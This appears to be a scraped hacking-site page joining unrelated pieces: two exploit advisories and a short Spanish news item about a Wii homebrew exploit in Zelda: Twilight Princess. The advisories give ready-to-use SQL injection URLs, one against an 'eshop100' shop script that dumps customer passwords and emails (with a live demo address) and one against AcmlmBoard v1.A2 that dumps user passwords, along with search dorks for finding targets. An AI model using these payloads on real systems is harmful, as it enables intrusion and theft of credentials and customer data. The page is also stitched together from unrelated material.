kernelpanic.org.mx

## AUTHOR : JuDge

## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com

## Script WebSite:http://www.eshop100.co.uk

##Dork::)

##DescRipTiON: pull customers info from database

##EXPLOITS:
www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/

0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,

25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*

##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1

/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,

18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*

#AcmlmBoard v1.A2 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: “AcmlmBoard v1.A2″
#
##
###
##
#
#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#SQL Injection:
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
#
#PoC:
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,

9,10,11,12,13,14,15,16%20from%20users–+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################

Exploit en Zelda abre la puerta al homebrew de Wii

Desde que se diera a conocer la posibilidad de cargar software casero en modo Wii en la consola de Nintendo los hackers de la scene están investigando todas las opciones. Una de ellas acaba de dar sus primeros frutos, se trata de un exploit en el Zelda: Twilight Princess que ha permitido, de momento de forma muy limitada, ejecutar código sin firmar. Lo interesante de la noticia es que este exploit podría usarse sin necesidad de modificar la consola y sus autores, Segher y Bushing, esperan que el avance conduzca a un cargador de homebrew.

fuente:TehSkeen